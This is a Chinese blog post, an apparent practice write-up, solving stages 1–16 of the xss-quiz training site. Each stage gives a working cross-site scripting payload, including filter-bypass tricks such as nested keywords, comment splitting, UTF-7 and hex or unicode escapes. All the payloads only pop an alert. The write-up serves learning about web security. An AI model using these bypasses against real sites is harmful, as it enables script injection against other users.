<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="bypass,xss," />





  <link rel="alternate" href="/atom.xml" title="SuNu11'Blog" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/images/w.ico?v=5.1.0" />






<meta name="description" content="科普XSS漏洞是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。">
<meta name="keywords" content="bypass,xss">
<meta property="og:type" content="article">
<meta property="og:title" content="我与XSS的感情之路(1)">
<meta property="og:url" content="http://sunu11.com/2017/07/20/12/index.html">
<meta property="og:site_name" content="SuNu11&#39;Blog">
<meta property="og:description" content="科普XSS漏洞是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-1.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-2.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-3.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-4.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-5.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-6.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-7.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-8.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-9.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-10.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-11.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-12.png">
<meta property="og:updated_time" content="2018-11-03T11:56:39.525Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="我与XSS的感情之路(1)">
<meta name="twitter:description" content="科普XSS漏洞是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。">
<meta name="twitter:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 'undefined',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://sunu11.com/2017/07/20/12/"/>





  <title> 我与XSS的感情之路(1) | SuNu11'Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  








  <div style="display: none;">
    <script src="//s95.cnzz.com/z_stat.php?id=1275798487&web_id=1275798487" language="JavaScript"></script>
  </div>





  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">SuNu11'Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/index.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/index.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/index.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/index.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-guide">
          <a href="/Guide/index.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-calendar"></i> <br />
            
            航海图
          </a>
        </li>
      
        
        <li class="menu-item menu-item-commonweal">
          <a href="/404/404.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            公益404
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
  <link itemprop="mainEntityOfPage" href="http://sunu11.com/2017/07/20/12/">

  <span style="display:none" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="name" content="SuNu11">
    <meta itemprop="description" content="">
    <meta itemprop="image" content="/images/me.png">
  </span>

  <span style="display:none" itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="SuNu11'Blog">
    <span style="display:none" itemprop="logo" itemscope itemtype="http://schema.org/ImageObject">
      <img style="display:none;" itemprop="url image" alt="SuNu11'Blog" src="">
    </span>
  </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                我与XSS的感情之路(1)
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-07-20T09:43:55+08:00">
                2017-07-20
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
              <span class="post-meta-divider">|</span>
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/WEB安全/" itemprop="url" rel="index">
                    <span itemprop="name">WEB安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          

          
          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="科普"><a href="#科普" class="headerlink" title="科普"></a>科普</h2><p>XSS漏洞是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。<a id="more"></a><br>攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击，黑客界共识是：跨站脚本攻击是新型的“缓冲区溢出攻击“，而JavaScript是新型的“ShellCode”。本文主要是通过几个在线练习平台，记录一下个人对于xss漏洞的一些思路和总结。</p>
<h2 id="平台1-xss-quiz"><a href="#平台1-xss-quiz" class="headerlink" title="平台1 xss-quiz"></a>平台1 <a href="http://xss-quiz.int21h.jp" target="_blank" rel="external">xss-quiz</a></h2><p><strong><em>Stage#1: <a href="http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9" target="_blank" rel="external">http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9</a></em></strong></p>
<p>使用正常xss payload弹出domain即可通过。payload如：<br><code>&lt;img onerrer=&quot;alert(document.domain);&quot;src=&gt; &lt;script&gt;alert(document.domain);&lt;/script&gt;</code></p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-1.png" alt="图1"></p>
<p><strong><em>Stage#2: <a href="http://xss-quiz.int21h.jp/stage2.php?sid=34ccb7f2bee3d0be52bf33339d0240c96f1cb61d" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage2.php?sid=34ccb7f2bee3d0be52bf33339d0240c96f1cb61d</a></em></strong><br>这一题关键在于语句需要闭合，当闭合语句后，均可触发。payload如：<br><code>&quot;&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;  &quot;onclick=alert(document.domain) value=&quot;asd</code></p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-2.png" alt="图2"></p>
<p><strong><em>Stage#3: <a href="http://xss-quiz.int21h.jp/stage-3.php?sid=f3a8820ead8d740c43effd6cdae1fa1b41d0f0f7" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage-3.php?sid=f3a8820ead8d740c43effd6cdae1fa1b41d0f0f7</a></em></strong><br>该题在写入js语句后，对尖括号进行了转义</p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-3.png" alt="图3"></p>
<p>尝试绕过，没有实现，但是可以在p2参数的参数值处构造跨站语句，成功弹出domain</p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-4.png" alt="图4"></p>
<p><strong><em>Stage#4: <a href="http://xss-quiz.int21h.jp/stage4.php?sid=9b47b7196b1da242b0d9ce4099ed0f17858b56e0" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage4.php?sid=9b47b7196b1da242b0d9ce4099ed0f17858b56e0</a></em></strong><br>p1、p2均作过滤了，在p3处闭合语句即可弹出，可通过查看源码发现隐藏的输入框，修改hackme的那个type为text，即p3的输入点即可，payload：<br><code>&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</code></p>
<p><strong><em>Stage#5: <a href="http://xss-quiz.int21h.jp/stage5.php?sid=b4d8b0467f463e3059a6e739d37739b6a364027e" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage5.php?sid=b4d8b0467f463e3059a6e739d37739b6a364027e</a></em></strong><br>长度限制，使用burp改包绕过即可。也可以更改如图所示长度进行绕过，payload：<br><code>&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</code></p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-5.png" alt="图5"></p>
<p><strong><em>Stage#6: <a href="http://xss-quiz.int21h.jp/stage6.php?sid=a9998f35ee37ef3664ab6c6fc2574f428231c725" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage6.php?sid=a9998f35ee37ef3664ab6c6fc2574f428231c725</a></em></strong><br>该题过滤了尖括号&lt;&gt;，<br><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-6.png" alt="图6"><br>尝试绕过，发现可用鼠标移动类进行绕过如：<br><code>&quot;onmouseover=&quot;alert(document.domain);&quot; &quot;onmouseout=&quot;alert(document.domain);&quot; &quot;onclick=alert(document.domain)等</code></p>
<p><strong><em>Stage#7: <a href="http://xss-quiz.int21h.jp/stage07.php?sid=deeba845f047ee9df2627ec269f20c955e2eb8b8" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage07.php?sid=deeba845f047ee9df2627ec269f20c955e2eb8b8</a></em></strong><br>通过测试，发现该题过滤了&lt;&gt;、”、&amp;等，而且输入空格后自动添加双引号，因此，可构造此类payload如: <code>a onmouseover=alert(document.domain)</code>实现弹窗。</p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-7.png" alt="图7"></p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-8.png" alt="图8"></p>
<p><strong><em>Stage#8: <a href="http://xss-quiz.int21h.jp/stage008.php?sid=1f0696e59ff506dee925f3e6bd62e9f5103543aa" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage008.php?sid=1f0696e59ff506dee925f3e6bd62e9f5103543aa</a></em></strong><br>此题采用javascript伪协议即可，比较简单。Payload：<code>javascript:alert(document.domain);</code></p>
<p><em>*</em>Stage#9: <a href="http://xss-quiz.int21h.jp/stage_09.php?sid=9fb2098e09f0cdf338e09149e6f1550706fc3934" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage_09.php?sid=9fb2098e09f0cdf338e09149e6f1550706fc3934</a><br>此题提示信息为UTF7,因此通过UTF-7转码即可，不用burp截包，需要更改charset类型为text，并更改其value为UTF-7,然后即可弹窗payload：<br><code>+ACIAIABvAG4AbQBvAHUAcwBlAG0AbwB2AGUAPQAiAGEAbABlAHIAdAAoAGQAbwBjAHUAbQBlAG4AdAAuAGQAbwBtAGEAaQBuACk-</code></p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-9.png" alt="图9"></p>
<p><strong><em>Stage#10: <a href="http://xss-quiz.int21h.jp/stage00010.php?sid=582038d983e1b7cff0888412ffa49b8ae03ecf38" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage00010.php?sid=582038d983e1b7cff0888412ffa49b8ae03ecf38</a></em></strong><br>通过提示可看到domain被过滤了，可使用dodomainmain嵌套的方式进行绕过，因此，payload为：<code>&quot;onmouseover=&quot;alert(document.domdomainain);//</code></p>
<p><strong><em>Stage#11: <a href="http://xss-quiz.int21h.jp/stage11th.php?sid=57ea445522e17a40142908ada7bd665857c358d9" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage11th.php?sid=57ea445522e17a40142908ada7bd665857c358d9</a></em></strong><br>可以从提示中看到过滤规则如下：”s/script/xscript/ig;” and “s/on[a-z]+=/onxxx=/ig;” and “s/style=/stxxx=/ig;”，因此可以通过进行编码的方式构造xss语句。注意闭合前后。即可弹窗，payload：<br><code>&quot;&gt;&lt;a href=javascr&amp;#105;pt:alert(document.domain)&gt;xss&lt;/a&gt;</code></p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-10.png" alt="图10"></p>
<p><strong><em>Stage#12: <a href="http://xss-quiz.int21h.jp/stage_no012.php?sid=7fc1df5b4cd62ce2afaaa11268a5039d3a67632a" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage_no012.php?sid=7fc1df5b4cd62ce2afaaa11268a5039d3a67632a</a></em></strong><br>此题过滤规则如下：”s/[\x00-\x20\&lt;>\”\’]//g;”，过滤很严，从x00-x20,&lt;&gt;,”’都被过滤，于是用什么闭合是此题的关键，在IE8下可以通过`进行闭合因此，可以构造payload：<br><code>`` onmouseover=alert(document.domain);</code></p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-11.png" alt="图11"></p>
<p><strong><em>Stage#13: <a href="http://xss-quiz.int21h.jp/stage13_0.php?sid=eb77af0358676519402c3be00df480f638b168b7" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage13_0.php?sid=eb77af0358676519402c3be00df480f638b168b7</a></em></strong><br>此题说是再CSS中用expression来实现js中的on事件，进而执行xss语句，再ie下可以利用，payload如下：xx:expression(onmouseover=function(){alert(document.domain)})</p>
<p><strong><em>Stage#14: <a href="http://xss-quiz.int21h.jp/stage-_-14.php?sid=91443a5a0cc083c52ce78d11b5bf1beb238cb93b" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage-_-14.php?sid=91443a5a0cc083c52ce78d11b5bf1beb238cb93b</a></em></strong><br>此题与上一题相似，但是做了过滤：s/(url|script|eval|expression)/xxx/ig;过滤url，eval，script，expression因此，需要尝试绕过过滤，经过尝试，可以利用注释符<code>/**/、\、\0、编码</code>等方式绕过。Payload如：<br><code>xx:expre/**/ssion(onmouseover=function(){alert(document.domain)})</code></p>
<p><strong><em>Stage#15：<a href="http://xss-quiz.int21h.jp/stage__15.php?sid=26ac2a0522c04a788c217fd8d7847aab1626f726" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage__15.php?sid=26ac2a0522c04a788c217fd8d7847aab1626f726</a></em></strong><br>本题经过测试将&lt;&gt;进行了转义，并且过滤了\，无法使用事件类型构造语句实现弹窗。因此考虑绕过其过滤规则，经过测试，可以使用编码进行绕过将&lt;&gt;进行16进制编码或者unicode编码即可。Payload:<br><code>\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e</code><br><code>\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e</code></p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-12.png" alt="图12"></p>
<p><strong><em>Stage#16：<a href="http://xss-quiz.int21h.jp/stage00000016.php?sid=b3c99680d88d8f9002dce8b26f167c9c0a3a73a9" target="_blank" rel="external">http://xss-quiz.int21h.jp/stage00000016.php?sid=b3c99680d88d8f9002dce8b26f167c9c0a3a73a9</a></em></strong><br>此题与上一题相似，多一部分过滤：”s/\x/\\x/ig;”，因此无法使用16进制来绕过&lt;&gt;的过滤，用unicode编码同样可以绕过，也可以使用10进制绕过。<br>Payload: <code>\\74script\\76alert(document.domain);\\74/script\\76</code></p>
<p>Stage#17、Stage#18因为版本问题，过不去23333333。</p>

      
    </div>
    <div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
      
    </div> 
    <div>
      
        

      
    </div>

    <div>
      
        
  <div align="center">
 
   <div class="">
   <p><span>
   <br/><br/><b>本文出处：</b><a href="/2017/07/20/12/" title="我与XSS的感情之路(1)">http://sunu11.com/2017/07/20/12/</a><br/><span><span><span><span><span><span><b>本文基于：</b><a target="_blank" title="Creative Commons Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)" href="http://creativecommons.org/licenses/by-sa/4.0/"> 知识共享署名-相同方式共享 4.0 </a>国际许可协议发布，欢迎转载，演绎或用于商业目的。但是必须保留本文的署名<a href="http://www.sunu11.com/">sunu11</a>及链接。
   </span></p>
   </div>
 
  </div>
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
      
        <div id="alipay" style="display: inline-block">
          <img id="alipay_qr" src="/images/alipay.png" alt="SuNu11 Alipay"/>
          <p>支付宝打赏</p>
        </div>
      
    </div>
  </div>


      
    </div>


    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/bypass/" rel="tag"><i class="fa fa-tag"></i> bypass</a>
          
            <a href="/tags/xss/" rel="tag"><i class="fa fa-tag"></i> xss</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/04/28/11/" rel="next" title="Web源码泄露总结">
                <i class="fa fa-chevron-left"></i> Web源码泄露总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/07/23/13/" rel="prev" title="我与XSS的感情之路(2)">
                我与XSS的感情之路(2) <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
  </div>
    

        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/me.png"
               alt="SuNu11" />
          <p class="site-author-name" itemprop="name">SuNu11</p>
          <p class="site-description motion-element" itemprop="description">淡泊以明志，宁静以致远</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives/index.html">
              <span class="site-state-item-count">31</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">43</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="http://mooder.f4ck0.com:8000/" target="_blank" title="Team Spaces">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Team Spaces
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://github.com/sunu11" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/sunu11" target="_blank" title="微博">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  微博
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              一路认识的师傅们
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.sec-redclub.com/" title="Redbu11" target="_blank">Redbu11</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://dbqf.xyz/" title="大兄弟独步清风" target="_blank">大兄弟独步清风</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.virzz.com/" title="V神Virink" target="_blank">V神Virink</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.monburan.cn/" title="大兄弟Monburan" target="_blank">大兄弟Monburan</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.cnblogs.com/n1ghtwatcher/" title="老哥n1ghtwatcher" target="_blank">老哥n1ghtwatcher</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.glamor.site/" title="大诏glamor" target="_blank">大诏glamor</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.cnblogs.com/piaomiaohongchen/" title="超神哥" target="_blank">超神哥</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.qclover.cn" title="华清Qclover" target="_blank">华清Qclover</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#科普"><span class="nav-number">1.</span> <span class="nav-text">科普</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#平台1-xss-quiz"><span class="nav-number">2.</span> <span class="nav-text">平台1 xss-quiz</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">SuNu11</span>
</div>


<div class="powered-by">
  由 <a>Hexo</a>&nbsp&nbsp&nbsp&nbsp<a href="http://www.miitbeian.gov.cn" target="_blank" title="备案信息">京ICP备16045158号</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  <script src="https://s96.cnzz.com/z_stat.php?id=1275798487&web_id=1275798487" language="JavaScript"</script>
   </span>
  </a>
</div>
<br>


        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  



  




	




  
  

  

  

  

  

  
  
  

  <div style="display: none;">
    <script src="//s95.cnzz.com/z_stat.php?id=1275798487&web_id=1275798487" language="JavaScript"></script>
  </div>



  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  
  <!-- 页面点击小红心 -->
  <script type="text/javascript" src="/js/src/love.js"></script>

  
  
</body>
</html>
